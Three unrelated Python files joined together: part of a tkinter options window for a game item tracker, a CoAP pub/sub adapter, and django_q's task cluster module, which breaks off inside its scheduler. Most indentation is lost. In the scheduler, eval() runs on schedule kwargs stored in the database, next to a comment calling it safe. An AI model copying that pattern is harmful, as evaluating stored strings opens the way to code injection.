self.labels["server_connect_label"].config(text=self.connection_labels["starting"])
t = threading.Thread(target=self.get_server_userlist_and_enqueue)
t.start()
self.checkbox_callback()
def write_callback(self):
if self.checks.get("write_to_server").get():
self.checks.get("read_from_server").set(0)
self.checkbox_callback()
def save_callback(self):
# Callback for the "save" option -- rejiggers options and saves to options.json, then quits
for key, value in self.entries.items():
if key in self.integer_keys:
                # Cast to float first to avoid errors if the user enters a value like 1.0 for an integer option
setattr(self.options, key, int(float(value.get())))
elif key in self.float_keys:
val = float(value.get())
setattr(self.options, key, val)
elif hasattr(value, "get"):
setattr(self.options, key, value.get())
for key, value in self.checks.items():
setattr(self.options, key, True if value.get() else False)
self.root.destroy()
    def seconds_to_text(self, seconds):
        # integer division so we report whole units ("2 minutes", never "2.5 minutes")
        if seconds < 60:
            return str(seconds) + " second" + ("s" if seconds > 1 else "")
        minutes = seconds // 60
        if minutes < 60:
            return str(minutes) + " minute" + ("s" if minutes > 1 else "")
        hours = minutes // 60
        if hours < 24:
            return str(hours) + " hour" + ("s" if hours > 1 else "")
        days = hours // 24
        return str(days) + " day" + ("s" if days > 1 else "")
def get_server_userlist_and_enqueue(self):
try:
url = self.entries['trackerserver_url'].get() + "/tracker/api/userlist/"
json_state = urllib.request.urlopen(url).read()
users = json.loads(json_state)
success = True
except Exception:
log_error("Problem getting userlist from tracker server\n" + traceback.format_exc())
users = []
success = False
network_result = {"users": users, "success": success}
self.network_queue.put(network_result)
def get_server_twitch_client_id(self):
try:
url = self.entries['trackerserver_url'].get() + "/tracker/api/twitchclientid/"
return urllib.request.urlopen(url).read()
except Exception:
log_error("Couldn't get twitch client id from tracker server\n" + traceback.format_exc())
return None
def process_network_results(self):
        # On OS X, Queue.qsize() is not implemented, so poll with empty() instead.
while not self.network_queue.empty():
try:
network_result = self.network_queue.get(0)
users_combobox_list = []
for user in network_result["users"]:
formatted_time_ago = self.seconds_to_text(user["seconds"])
list_entry = user["name"] + " (updated " + formatted_time_ago + " ago)"
users_combobox_list.append(list_entry)
self.entries['twitch_name']['values'] = users_combobox_list
label = "done" if network_result["success"] else "fail"
self.labels["server_connect_label"].config(text=self.connection_labels[label])
            except QueueEmpty:
                pass
self.root.after(100, self.process_network_results)
def trim_name(self, event):
name = self.entries['twitch_name'].get()
name = name.partition(" (")[0]
self.entries['twitch_name'].set(name)
# From: http://code.activestate.com/recipes/527747-invert-css-hex-colors/
def opposite_color(self, color):
# Get the opposite color of a hex color, just to make text on buttons readable
color = color.lower()
table = str.maketrans('0123456789abcdef', 'fedcba9876543210')
return str(color).translate(table).upper()
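    # e.g. opposite_color("#00ff00") -> "#FF00FF", which keeps button text readable on the chosen background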
# From: http://stackoverflow.com/questions/4140437/interactively-validating-entry-widget-content-in-tkinter
def ValidateNumeric(self, d, i, P, s, S, v, V, W):
# This validation is a biiit janky, just some crazy regex that checks P (value of entry after modification)
return P == "" or re.search("^\d+(\.\d*)?$", P) is not None
def run(self):
# Create root
self.root = Tk()
self.root.attributes("-topmost", True)
self.root.wm_title("Item Tracker Options")
self.root.resizable(False, False)
if platform.system() == "Darwin":
self.root.iconbitmap('options.ico')
elif platform.system() == "Linux":
self.root.iconbitmap('@options.xbm')
else:
self.root.iconbitmap(default = 'options.ico')
# Generate numeric options by looping over option types
self.integer_keys = ["message_duration", "framerate_limit", "read_delay"]
self.float_keys = ["size_multiplier", "log_file_check_seconds"]
self.entries = {}
self.labels = {}
self.checks = {}
self.buttons = {}
# Draw the "Text Options" box
text_options_frame = LabelFrame(self.root, text="Text Options", padx=40, pady=20)
text_options_frame.grid(row=0, column=0, padx=5, pady=2)
validate_numeric_field = (self.root.register(self.ValidateNumeric), '%d', '%i', '%P', '%s', '%S', '%v', '%V', '%W')
next_row = 0
for index, opt in enumerate(["message_duration"]):
Label(text_options_frame, text=self.pretty_name(opt)).grid(row=next_row)
self.entries[opt] = Entry(text_options_frame, validate="key", validatecommand=validate_numeric_field)
self.entries[opt].grid(row=next_row, column=1)
self.entries[opt].insert(0, getattr(self.options, opt))
if opt in self.label_after_text:
Label(text_options_frame, text=self.label_after_text[opt]).grid(row=next_row, column=2)
next_row += 1
for index, opt in enumerate(["show_font"]):
Label(text_options_frame, text=self.pretty_name(opt)).grid(row=next_row)
initialfont = StringVar()
initialfont.set(getattr(self.options, opt))
self.entries[opt] = tkinter.ttk.Combobox(text_options_frame, values=sorted(self.fonts), textvariable=initialfont, state='readonly')
self.entries[opt].grid(row=next_row, column=1)
for index, opt in enumerate(["bold_font"]):
self.checks[opt] = IntVar()
c = Checkbutton(text_options_frame, text=self.pretty_name(opt), variable=self.checks[opt])
c.grid(row=next_row, column=2)
next_row += 1
if getattr(self.options, opt):
c.select()
for index, opt in enumerate(["status_message"]):
Label(text_options_frame, text=self.pretty_name(opt)).grid(row=next_row)
self.entries[opt] = Entry(text_options_frame)
self.entries[opt].grid(row=next_row, column=1)
self.entries[opt].insert(0, getattr(self.options, opt))
next_row += 1
text_checkboxes = ["show_description", "show_status_message", "word_wrap"]
for index, opt in enumerate(text_checkboxes):
self.checks[opt] = IntVar()
c = Checkbutton(text_options_frame, text=self.pretty_name(opt), variable=self.checks[opt])
c.grid(row=int(len(text_checkboxes) + 1 + index / 2), column=index % 2) # 2 checkboxes per row
if getattr(self.options, opt):
c.select()
# Disable letting the user set the message duration if the show description option is disabled
if opt == "show_description" or opt == "show_status_message":
c.configure(command=self.checkbox_callback)
# Draw the other options box
display_options_frame = LabelFrame(self.root, text="", padx=22, pady=20)
display_options_frame.grid(row=1, column=0, padx=5, pady=2)
next_row = 0
for index, opt in enumerate(["game_version"]):
Label(display_options_frame, text=self.pretty_name(opt)).grid(row=next_row)
initialversion = StringVar()
initialversion.set(getattr(self.options, opt))
self.entries[opt] = tkinter.ttk.Combobox(display_options_frame, values=self.game_versions, textvariable=initialversion, state='readonly')
self.entries[opt].grid(row=next_row, column=1)
next_row += 1
for index, opt in enumerate(["framerate_limit", "log_file_check_seconds", "size_multiplier"]):
Label(display_options_frame, text=self.pretty_name(opt)).grid(row=next_row)
self.entries[opt] = Entry(display_options_frame, validate="key", validatecommand=validate_numeric_field)
self.entries[opt].grid(row=next_row, column=1)
self.entries[opt].insert(0, getattr(self.options, opt))
if opt in self.label_after_text:
Label(display_options_frame, text=self.label_after_text[opt]).grid(row=next_row, column=2)
next_row += 1
# Generate text options by looping over option types
for index, opt in enumerate(["item_details_link"]):
Label(display_options_frame, text=self.pretty_name(opt)).grid(row=next_row)
self.entries[opt] = Entry(display_options_frame)
self.entries[opt].grid(row=next_row, column=1)
self.entries[opt].insert(0, getattr(self.options, opt))
next_row += 1
# Generate buttons by looping over option types
for index, opt in enumerate(["background_color", "text_color"]):
self.buttons[opt] = Button(
display_options_frame,
text=self.pretty_name(opt),
bg=getattr(self.options, opt),
fg=self.opposite_color(getattr(self.options, opt)),
command=lambda opt=opt: self.color_callback(opt)
)
self.buttons[opt].grid(row=len(self.entries), column=index)
# Generate checkboxes, with special exception for show_description for message duration
for index, opt in enumerate(
["show_jacob_esau_items", "show_item_ids", "enable_mouseover", "show_floors", "show_rerolled_items", "show_health_ups",
"show_space_items", "show_blind_icon", "make_items_glow", "blck_cndl_mode",
"check_for_updates", "custom_title_enabled"]):
self.checks[opt] = IntVar()
c = Checkbutton(display_options_frame, text=self.pretty_name(opt), variable=self.checks[opt])
c.grid(row=int(len(self.entries) + 1 + index / 2), column=index % 2) # 2 checkboxes per row
if getattr(self.options, opt):
c.select()
if opt == "custom_title_enabled":
c.configure(command=self.checkbox_callback)
next_row += int(len(self.entries) / 2 + 1)
# Generate label for custom title
Label(display_options_frame, text=self.pretty_name("custom_title")).grid(row=next_row)
self.entries["custom_title"] = Entry(display_options_frame)
self.entries["custom_title"].grid(row=next_row, column=1)
self.entries["custom_title"].insert(0, getattr(self.options, "custom_title"))
next_row += 1
# Draw the "Tournament Settings" box
tournament_settings_frame = LabelFrame(self.root, text="Tournament Settings", padx=19, pady=20)
tournament_settings_frame.grid(row=0, column=1, rowspan=2, sticky=N, pady=2)
next_row = 0
for index, opt in enumerate(["change_server"]):
self.checks[opt] = IntVar()
c = Checkbutton(tournament_settings_frame, text=self.pretty_name(opt), variable=self.checks[opt], indicatoron=False)
c.grid(row=next_row, column=0, pady=2)
c.configure(command=self.checkbox_callback)
if getattr(self.options, opt, False):
c.select()
next_row += 1
# Generate text options by looping over option types
for index, opt in enumerate(["trackerserver_url"]):
self.labels[opt] = Label(tournament_settings_frame, text=self.pretty_name(opt))
self.labels[opt].grid(row=next_row, pady=2)
self.entries[opt] = Entry(tournament_settings_frame)
self.entries[opt].grid(row=next_row, column=1, pady=2)
self.entries[opt].insert(0, getattr(self.options, opt, ""))
next_row += 1
paddings = {"read_from_server": 5, "write_to_server": 120}
callbacks = {"read_from_server":self.read_callback, "write_to_server":self.write_callback}
for index, opt in enumerate(["read_from_server", "write_to_server"]):
self.checks[opt] = IntVar()
c = Checkbutton(tournament_settings_frame, text=self.pretty_name(opt), variable=self.checks[opt], indicatoron=False)
c.grid(row=next_row, column=index, pady=2, padx=paddings[opt])
c.configure(command=callbacks[opt])
if getattr(self.options, opt, False):
c.select()
next_row += 1
for index, opt in enumerate(["server_connect_label"]):
self.labels[opt] = Label(self.root, text="", width=len(self.connection_labels["fail"]))
self.labels[opt].grid(row=next_row, pady=2, columnspan=2, in_=tournament_settings_frame)
next_row += 1
for index, opt in enumerate(["twitch_name"]):
self.labels[opt] = Label(tournament_settings_frame, text=self.pretty_name(opt))
self.labels[opt].grid(row=next_row, pady=2)
self.entries[opt] = tkinter.ttk.Combobox(tournament_settings_frame, width=40)
self.entries[opt].set(getattr(self.options, opt, ""))
self.entries[opt].bind("<<ComboboxSelected>>", self.trim_name)
self.entries[opt].grid(row=next_row, column=1)
next_row += 1
# Generate text options by looping over option types
for index, opt in enumerate(["read_delay", "trackerserver_authkey"]):
self.labels[opt] = Label(tournament_settings_frame, text=self.pretty_name(opt))
self.labels[opt].grid(row=next_row, pady=2)
self.entries[opt] = Entry(tournament_settings_frame)
self.entries[opt].grid(row=next_row, column=1, pady=2)
self.entries[opt].insert(0, getattr(self.options, opt, ""))
next_row += 1
def authkey_fn():
self.entries["trackerserver_authkey"].delete(0, last=END)
twitch_client_id = self.get_server_twitch_client_id()
if twitch_client_id is not None:
webbrowser.open("https://api.twitch.tv/kraken/oauth2/authorize?response_type=token&client_id=" + twitch_client_id.decode('utf-8') + "&redirect_uri=" + self.entries['trackerserver_url'].get() + "/tracker/setup&scope=", autoraise=True)
else:
# TODO: show an error
pass
self.buttons["authkey_button"] = Button(
tournament_settings_frame,
text="Get an authkey",
command=authkey_fn
)
self.buttons["authkey_button"].grid(row=next_row, column=1, pady=5)
# Draw the "Transparent Mode" box
transparent_mode_frame = LabelFrame(self.root, text="Transparent Mode", padx=25, pady=9)
transparent_mode_frame.grid(row=1, column=1, pady=2, sticky=S)
transparent_mode_frame.grid_location(200,200)
if platform.system() == "Windows":
text = Label(transparent_mode_frame, text="The tracker will always be on top of other windows, except when the game is in fullscreen.\n\nYou can't resize/move/minimize/close the window, you have to be in non-transparent\nmode. Middle-click on the tracker to switch modes.\n\nThe background color will always be #2C2C00 (RGB(44, 44, 0)) because of performance\nand readability reasons. You can use this color to setup a chromakey in streaming\nsoftwares, setting the similarity and smoothness at minimum.\n\nThe \"Make Items Glow\" option is also disabled for readability reasons.")
text.pack()
for index, opt in enumerate(["transparent_mode"]):
self.checks[opt] = IntVar()
c = Checkbutton(transparent_mode_frame, text=self.pretty_name(opt), variable=self.checks[opt])
c.pack()
if getattr(self.options, opt):
c.select()
else:
text = Label(transparent_mode_frame, text="This only works on Windows for the moment.\nIf you have a solution for it, fork the repository on GitHub,\nmake a feature and do a Pull Request")
text.pack()
# Check for coherency in options with priority to read
self.read_callback()
# Disable some textboxes if needed
self.checkbox_callback()
button_save_frame = LabelFrame(self.root, bd=0, pady=5)
button_save_frame.grid(row=2, column=0, sticky="e")
button_cancel_frame = LabelFrame(self.root, bd=0, pady=5)
button_cancel_frame.grid(row=2, column=1, sticky="w")
# Save and cancel buttons
save = Button(
button_save_frame,
text="Save",
command=self.save_callback
)
save.grid(row=0, column=0, padx=2)
cancel = Button(
button_cancel_frame,
text="Cancel",
command=self.root.destroy
)
cancel.grid(row=0, column=0, padx=2)
# We're going to jump through a lot of hoops so we can position the options window on top of the tracker...
# ... WITHOUT going off the edge of the screen
# First we start out placing ourselves at the tracker's position
x_pos = getattr(self.options, "x_position")
y_pos = getattr(self.options, "y_position")
# Now we make ourselves invisible and fullscreen (this is a hack to measure the size and position of the monitor)
# We can't use the "screenwidth" and "screenheight" functions because they only give info on the primary display!
self.root.geometry('+%d+%d' % (x_pos, y_pos))
self.root.attributes("-alpha", 00)
if platform.system() == "Windows":
self.root.state("zoomed")
self.root.update()
else:
if platform.system() != "Darwin":
# todo: figure out how to do this on mac. Right now this hacky logic to avoid going
# off the edge of the screen is doing who-knows-what when run on a mac.
self.root.attributes("-fullscreen", True)
# For some reason using 'update' here affects the actual window height we want to get later
self.root.update_idletasks()
# Our current width and height are now our display's width and height
screen_width = self.root.winfo_width()
screen_height = self.root.winfo_height()
# Get the upper left corner of the monitor
origin_x = self.root.winfo_x()
origin_y = self.root.winfo_y()
# Now we get out of invisible fullscreen mode
self.root.attributes("-alpha", 0xFF)
if platform.system() == "Windows":
self.root.state("normal")
else:
if platform.system() != "Darwin":
self.root.attributes("-fullscreen", False) # todo: figure out how to do this on mac
self.root.update()
# Here's the actual size of the window we're drawing
window_width = self.root.winfo_width()
window_height = self.root.winfo_height()
# Now we can make sure we don't go off the sides
max_x = origin_x + screen_width - window_width - 50
max_y = origin_y + screen_height - window_height - 50
x_pos = min(x_pos, max_x)
y_pos = min(y_pos, max_y)
# Clamp origin after clamping the other side, so that if our window is too big we lose the bottom/right instead of top/left
x_pos = max(x_pos, origin_x)
y_pos = max(y_pos, origin_y)
self.root.geometry('+%d+%d' % (x_pos, y_pos))
self.root.update()
self.root.focus_force()
# We're polling this queue for network results 10 times per second. This avoids blocking the main thread when we talk to the server
self.root.after(100, self.process_network_results)
# Start the main loop
mainloop()
|
CoapAdapter.py
|
from aiocoap import *
import threading
import asyncio
class CoapAdapter:
def __init__(self, controller):
self.controller = controller
self.broker_address = None
self.protocol = None
self.topics = []
async def connect(self, address):
self.broker_address = address
async def subscribe(self, topic, qos=None):
self.topics.append(topic)
new_loop = asyncio.new_event_loop()
t = threading.Thread(target=self.start_loop, args=(new_loop, topic, ))
t.start()
async def publish(self, topic, identifier, payload, settings):
msg = Message(code=PUT, uri="coap://[{0}]:5683/ps/{1}".format(self.broker_address, topic),
payload=bytes(str(identifier + payload), encoding="utf-8"))
response = await self.protocol.request(msg).response
async def start_client(self):
self.protocol = await Context.create_client_context()
async def stop_client(self):
protocol = await Context.create_client_context()
for topic in self.topics:
# observe=1 asks the broker to cancel the observation of this topic
request = Message(code=GET, uri='coap://[{0}]:5683/ps/{1}'.format(self.broker_address, topic), observe=1)
await protocol.request(request).response
def start_loop(self, loop, topic):
asyncio.set_event_loop(loop)
loop.run_until_complete(self.observing(topic))
async def observing(self, topic):
protocol = await Context.create_client_context()
# Address for Test Broker: 2402:9400:1000:7::FFFF
msg = Message(code=POST, uri="coap://[{0}]:5683/ps".format(self.broker_address), payload=bytes("<{0}>;ct=0".format(topic), encoding="utf-8"))
response = await protocol.request(msg).response
request = Message(code=GET, uri='coap://[{0}]:5683/ps/{1}'.format(self.broker_address, topic), observe=0)
pr = protocol.request(request)
r = await pr.response
async for r in pr.observation:
self.controller.react(topic, r.payload.decode("utf-8"))
|
cluster.py
|
# Standard
import ast
import importlib
import signal
import socket
import traceback
import uuid
from multiprocessing import Event, Process, Value, current_process
from time import sleep
# External
import arrow
# Django
from django import db, core
from django.apps.registry import apps
try:
apps.check_apps_ready()
except core.exceptions.AppRegistryNotReady:
import django
django.setup()
from django.conf import settings
from django.utils import timezone
from django.utils.translation import gettext_lazy as _
# Local
import django_q.tasks
from django_q.brokers import get_broker, Broker
from django_q.conf import (
Conf,
logger,
psutil,
get_ppid,
error_reporter,
croniter,
resource,
)
from django_q.humanhash import humanize
from django_q.models import Task, Success, Schedule
from django_q.queues import Queue
from django_q.signals import pre_execute
from django_q.signing import SignedPackage, BadSignature
from django_q.status import Stat, Status
class Cluster:
def __init__(self, broker: Broker = None):
self.broker = broker or get_broker()
self.sentinel = None
self.stop_event = None
self.start_event = None
self.pid = current_process().pid
self.cluster_id = uuid.uuid4()
self.host = socket.gethostname()
self.timeout = Conf.TIMEOUT
signal.signal(signal.SIGTERM, self.sig_handler)
signal.signal(signal.SIGINT, self.sig_handler)
def start(self) -> int:
# Start Sentinel
self.stop_event = Event()
self.start_event = Event()
self.sentinel = Process(
target=Sentinel,
args=(
self.stop_event,
self.start_event,
self.cluster_id,
self.broker,
self.timeout,
),
)
self.sentinel.start()
logger.info(_(f"Q Cluster {self.name} starting."))
while not self.start_event.is_set():
sleep(0.1)
return self.pid
def stop(self) -> bool:
if not self.sentinel.is_alive():
return False
logger.info(_(f"Q Cluster {self.name} stopping."))
self.stop_event.set()
self.sentinel.join()
logger.info(_(f"Q Cluster {self.name} has stopped."))
self.start_event = None
self.stop_event = None
return True
def sig_handler(self, signum, frame):
logger.debug(
_(
f'{current_process().name} got signal {Conf.SIGNAL_NAMES.get(signum, "UNKNOWN")}'
)
)
self.stop()
@property
def stat(self) -> Status:
if self.sentinel:
return Stat.get(pid=self.pid, cluster_id=self.cluster_id)
return Status(pid=self.pid, cluster_id=self.cluster_id)
@property
def name(self) -> str:
return humanize(self.cluster_id.hex)
@property
def is_starting(self) -> bool:
return self.stop_event and self.start_event and not self.start_event.is_set()
@property
def is_running(self) -> bool:
return self.stop_event and self.start_event and self.start_event.is_set()
@property
def is_stopping(self) -> bool:
return (
self.stop_event
and self.start_event
and self.start_event.is_set()
and self.stop_event.is_set()
)
@property
def has_stopped(self) -> bool:
return self.start_event is None and self.stop_event is None and self.sentinel
class Sentinel:
def __init__(
self,
stop_event,
start_event,
cluster_id,
broker=None,
timeout=Conf.TIMEOUT,
start=True,
):
# Make sure we catch signals for the pool
signal.signal(signal.SIGINT, signal.SIG_IGN)
signal.signal(signal.SIGTERM, signal.SIG_DFL)
self.pid = current_process().pid
self.cluster_id = cluster_id
self.parent_pid = get_ppid()
self.name = current_process().name
self.broker = broker or get_broker()
self.reincarnations = 0
self.tob = timezone.now()
self.stop_event = stop_event
self.start_event = start_event
self.pool_size = Conf.WORKERS
self.pool = []
self.timeout = timeout
self.task_queue = (
Queue(maxsize=Conf.QUEUE_LIMIT) if Conf.QUEUE_LIMIT else Queue()
)
self.result_queue = Queue()
self.event_out = Event()
self.monitor = None
self.pusher = None
if start:
self.start()
def start(self):
self.broker.ping()
self.spawn_cluster()
self.guard()
def status(self) -> str:
if not self.start_event.is_set() and not self.stop_event.is_set():
return Conf.STARTING
elif self.start_event.is_set() and not self.stop_event.is_set():
if self.result_queue.empty() and self.task_queue.empty():
return Conf.IDLE
return Conf.WORKING
elif self.stop_event.is_set() and self.start_event.is_set():
if self.monitor.is_alive() or self.pusher.is_alive() or len(self.pool) > 0:
return Conf.STOPPING
return Conf.STOPPED
def spawn_process(self, target, *args) -> Process:
"""
:type target: function or class
"""
p = Process(target=target, args=args)
p.daemon = True
if target == worker:
p.daemon = Conf.DAEMONIZE_WORKERS
p.timer = args[2]
self.pool.append(p)
p.start()
return p
def spawn_pusher(self) -> Process:
return self.spawn_process(pusher, self.task_queue, self.event_out, self.broker)
def spawn_worker(self):
self.spawn_process(
worker, self.task_queue, self.result_queue, Value("f", -1), self.timeout
)
def spawn_monitor(self) -> Process:
return self.spawn_process(monitor, self.result_queue, self.broker)
def reincarnate(self, process):
"""
:param process: the process to reincarnate
:type process: Process or None
"""
close_old_django_connections()
if process == self.monitor:
self.monitor = self.spawn_monitor()
logger.error(_(f"reincarnated monitor {process.name} after sudden death"))
elif process == self.pusher:
self.pusher = self.spawn_pusher()
logger.error(_(f"reincarnated pusher {process.name} after sudden death"))
else:
self.pool.remove(process)
self.spawn_worker()
if process.timer.value == 0:
# only need to terminate on timeout, otherwise we risk destabilizing the queues
process.terminate()
logger.warning(_(f"reincarnated worker {process.name} after timeout"))
elif int(process.timer.value) == -2:
logger.info(_(f"recycled worker {process.name}"))
else:
logger.error(_(f"reincarnated worker {process.name} after death"))
self.reincarnations += 1
def spawn_cluster(self):
self.pool = []
Stat(self).save()
close_old_django_connections()
# spawn worker pool
for __ in range(self.pool_size):
self.spawn_worker()
# spawn auxiliary
self.monitor = self.spawn_monitor()
self.pusher = self.spawn_pusher()
# set worker cpu affinity if needed
if psutil and Conf.CPU_AFFINITY:
set_cpu_affinity(Conf.CPU_AFFINITY, [w.pid for w in self.pool])
def guard(self):
logger.info(
_(
f"{current_process().name} guarding cluster {humanize(self.cluster_id.hex)}"
)
)
self.start_event.set()
Stat(self).save()
logger.info(_(f"Q Cluster {humanize(self.cluster_id.hex)} running."))
counter = 0
cycle = Conf.GUARD_CYCLE # guard loop sleep in seconds
# Guard loop. Runs at least once
while not self.stop_event.is_set() or not counter:
# Check Workers
for p in self.pool:
with p.timer.get_lock():
# Are you alive?
if not p.is_alive() or p.timer.value == 0:
self.reincarnate(p)
continue
# Decrement timer if work is being done
if p.timer.value > 0:
p.timer.value -= cycle
# Check Monitor
if not self.monitor.is_alive():
self.reincarnate(self.monitor)
# Check Pusher
if not self.pusher.is_alive():
self.reincarnate(self.pusher)
# Call scheduler once a minute (or so)
counter += cycle
if counter >= 30 and Conf.SCHEDULER:
counter = 0
scheduler(broker=self.broker)
# Save current status
Stat(self).save()
sleep(cycle)
self.stop()
def stop(self):
Stat(self).save()
name = current_process().name
logger.info(_(f"{name} stopping cluster processes"))
# Stopping pusher
self.event_out.set()
# Wait for it to stop
while self.pusher.is_alive():
sleep(0.1)
Stat(self).save()
# Put poison pills in the queue
for __ in range(len(self.pool)):
self.task_queue.put("STOP")
self.task_queue.close()
# wait for the task queue to empty
self.task_queue.join_thread()
# Wait for all the workers to exit
while len(self.pool):
for p in self.pool:
if not p.is_alive():
self.pool.remove(p)
sleep(0.1)
Stat(self).save()
# Finally stop the monitor
self.result_queue.put("STOP")
self.result_queue.close()
# Wait for the result queue to empty
self.result_queue.join_thread()
logger.info(_(f"{name} waiting for the monitor."))
# Wait for everything to close or time out
count = 0
if not self.timeout:
self.timeout = 30
while self.status() == Conf.STOPPING and count < self.timeout * 10:
sleep(0.1)
Stat(self).save()
count += 1
# Final status
Stat(self).save()
def pusher(task_queue: Queue, event: Event, broker: Broker = None):
"""
Pulls tasks off the broker and puts them in the task queue
:type broker:
:type task_queue: multiprocessing.Queue
:type event: multiprocessing.Event
"""
if not broker:
broker = get_broker()
logger.info(_(f"{current_process().name} pushing tasks at {current_process().pid}"))
while True:
try:
task_set = broker.dequeue()
except Exception as e:
logger.error(e, traceback.format_exc())
# broker probably crashed. Let the sentinel handle it.
sleep(10)
break
if task_set:
for task in task_set:
ack_id = task[0]
# unpack the task
try:
task = SignedPackage.loads(task[1])
except (TypeError, BadSignature) as e:
logger.error(e, traceback.format_exc())
broker.fail(ack_id)
continue
task["ack_id"] = ack_id
task_queue.put(task)
logger.debug(_(f"queueing from {broker.list_key}"))
if event.is_set():
break
logger.info(_(f"{current_process().name} stopped pushing tasks"))
def monitor(result_queue: Queue, broker: Broker = None):
"""
Gets finished tasks from the result queue and saves them to Django
:type broker: brokers.Broker
:type result_queue: multiprocessing.Queue
"""
if not broker:
broker = get_broker()
name = current_process().name
logger.info(_(f"{name} monitoring at {current_process().pid}"))
for task in iter(result_queue.get, "STOP"):
# save the result
if task.get("cached", False):
save_cached(task, broker)
else:
save_task(task, broker)
# acknowledge result
ack_id = task.pop("ack_id", False)
if ack_id and (task["success"] or task.get("ack_failure", False)):
broker.acknowledge(ack_id)
# log the result
if task["success"]:
# log success
logger.info(_(f"Processed [{task['name']}]"))
else:
# log failure
logger.error(_(f"Failed [{task['name']}] - {task['result']}"))
logger.info(_(f"{name} stopped monitoring results"))
def worker(
task_queue: Queue, result_queue: Queue, timer: Value, timeout: int = Conf.TIMEOUT
):
"""
Takes a task from the task queue, tries to execute it and puts the result back in the result queue
:param timeout: number of seconds wait for a worker to finish.
:type task_queue: multiprocessing.Queue
:type result_queue: multiprocessing.Queue
:type timer: multiprocessing.Value
"""
name = current_process().name
logger.info(_(f"{name} ready for work at {current_process().pid}"))
task_count = 0
if timeout is None:
timeout = -1
# Start reading the task queue
for task in iter(task_queue.get, "STOP"):
result = None
timer.value = -1 # Idle
task_count += 1
# Get the function from the task
logger.info(_(f'{name} processing [{task["name"]}]'))
f = task["func"]
# if it's not an instance try to get it from the string
if not callable(task["func"]):
try:
module, func = f.rsplit(".", 1)
m = importlib.import_module(module)
f = getattr(m, func)
except (ValueError, ImportError, AttributeError) as e:
result = (e, False)
if error_reporter:
error_reporter.report()
# We're still going
if not result:
close_old_django_connections()
timer_value = task.pop("timeout", timeout)
# signal execution
pre_execute.send(sender="django_q", func=f, task=task)
# execute the payload
timer.value = timer_value # Busy
try:
res = f(*task["args"], **task["kwargs"])
result = (res, True)
except Exception as e:
result = (f"{e} : {traceback.format_exc()}", False)
if error_reporter:
error_reporter.report()
if task.get("sync", False):
raise
with timer.get_lock():
# Process result
task["result"] = result[0]
task["success"] = result[1]
task["stopped"] = timezone.now()
result_queue.put(task)
timer.value = -1 # Idle
# Recycle
if task_count == Conf.RECYCLE or rss_check():
timer.value = -2 # Recycled
break
logger.info(_(f"{name} stopped doing work"))
def save_task(task, broker: Broker):
"""
Saves the task package to Django or the cache
:param task: the task package
:type broker: brokers.Broker
"""
# SAVE LIMIT < 0 : Don't save success
if not task.get("save", Conf.SAVE_LIMIT >= 0) and task["success"]:
return
# enqueues next in a chain
if task.get("chain", None):
django_q.tasks.async_chain(
task["chain"],
group=task["group"],
cached=task["cached"],
sync=task["sync"],
broker=broker,
)
# SAVE LIMIT > 0: Prune database, SAVE_LIMIT 0: No pruning
close_old_django_connections()
try:
with db.transaction.atomic():
last = Success.objects.select_for_update().last()
if task["success"] and 0 < Conf.SAVE_LIMIT <= Success.objects.count():
last.delete()
# check if this task has previous results
if Task.objects.filter(id=task["id"], name=task["name"]).exists():
existing_task = Task.objects.get(id=task["id"], name=task["name"])
# only update the result if it hasn't succeeded yet
if not existing_task.success:
existing_task.stopped = task["stopped"]
existing_task.result = task["result"]
existing_task.success = task["success"]
existing_task.attempt_count = existing_task.attempt_count + 1
existing_task.save()
if Conf.MAX_ATTEMPTS > 0 and existing_task.attempt_count >= Conf.MAX_ATTEMPTS:
broker.acknowledge(task['ack_id'])
else:
Task.objects.create(
id=task["id"],
name=task["name"],
func=task["func"],
hook=task.get("hook"),
args=task["args"],
kwargs=task["kwargs"],
started=task["started"],
stopped=task["stopped"],
result=task["result"],
group=task.get("group"),
success=task["success"],
attempt_count=1
)
except Exception as e:
logger.error(e)
def save_cached(task, broker: Broker):
task_key = f'{broker.list_key}:{task["id"]}'
timeout = task["cached"]
if timeout is True:
timeout = None
try:
group = task.get("group", None)
iter_count = task.get("iter_count", 0)
# if it's a group append to the group list
if group:
group_key = f"{broker.list_key}:{group}:keys"
group_list = broker.cache.get(group_key) or []
# if it's an iter group, check if we are ready
if iter_count and len(group_list) == iter_count - 1:
group_args = f"{broker.list_key}:{group}:args"
# collate the results into a Task result
results = [
SignedPackage.loads(broker.cache.get(k))["result"]
for k in group_list
]
results.append(task["result"])
task["result"] = results
task["id"] = group
task["args"] = SignedPackage.loads(broker.cache.get(group_args))
task.pop("iter_count", None)
task.pop("group", None)
if task.get("iter_cached", None):
task["cached"] = task.pop("iter_cached", None)
save_cached(task, broker=broker)
else:
save_task(task, broker)
broker.cache.delete_many(group_list)
broker.cache.delete_many([group_key, group_args])
return
# save the group list
group_list.append(task_key)
broker.cache.set(group_key, group_list, timeout)
# async_task next in a chain
if task.get("chain", None):
django_q.tasks.async_chain(
task["chain"],
group=group,
cached=task["cached"],
sync=task["sync"],
broker=broker,
)
# save the task
broker.cache.set(task_key, SignedPackage.dumps(task), timeout)
except Exception as e:
logger.error(e)
def scheduler(broker: Broker = None):
"""
Creates a task from a schedule at the scheduled time and schedules next run
"""
if not broker:
broker = get_broker()
close_old_django_connections()
try:
with db.transaction.atomic(using=Schedule.objects.db):
for s in (
Schedule.objects.select_for_update()
.exclude(repeats=0)
.filter(next_run__lt=timezone.now())
.filter(db.models.Q(cluster__isnull=True) | db.models.Q(cluster=Conf.PREFIX))
):
args = ()
kwargs = {}
# get args, kwargs and hook
if s.kwargs:
try:
# eval should be safe here because dict()
kwargs = eval(f"dict({s.kwargs})")
except SyntaxError:
kwargs = {}
if s.args:
args = ast.literal_eval(s.args)
# single value won't eval to tuple, so:
if type(args) != tuple:
args = (args,)
q_options = kwargs.get("q_options", {})
if s.hook:
q_options["hook"] = s.hook
# set up the next run time
if s.schedule_type != s.ONCE:
next_run = arrow.get(s.next_run)
while True:
if s.schedule_type == s.MINUTES:
next_run = next_run.shift(minutes=+(s.minutes or 1))
elif s.schedule_type == s.HOURLY:
next_run = next_run.shift(hours=+1)
elif s.schedule_type == s.DAILY:
next_run = next_run.shift(days=+1)
elif s.schedule_type == s.WEEKLY:
next_run = next_run.shift(weeks=+1)
elif s.schedule_type == s.MONTHLY:
next_run = next_run.shift(months=+1)
elif s.schedule_type == s.QUARTERLY:
next_run = next_run.shift(months=+3)
elif s.schedule_type == s.YEARLY:
next_run = next_run.shift(years=+1)
elif s.schedule_type == s.CRON:
if not croniter:
raise ImportError(
_(
"Please install croniter to enable cron expressions"
)
)
next_run = arrow.get(
croniter(s.cron, timezone.localtime()).get_next()
)
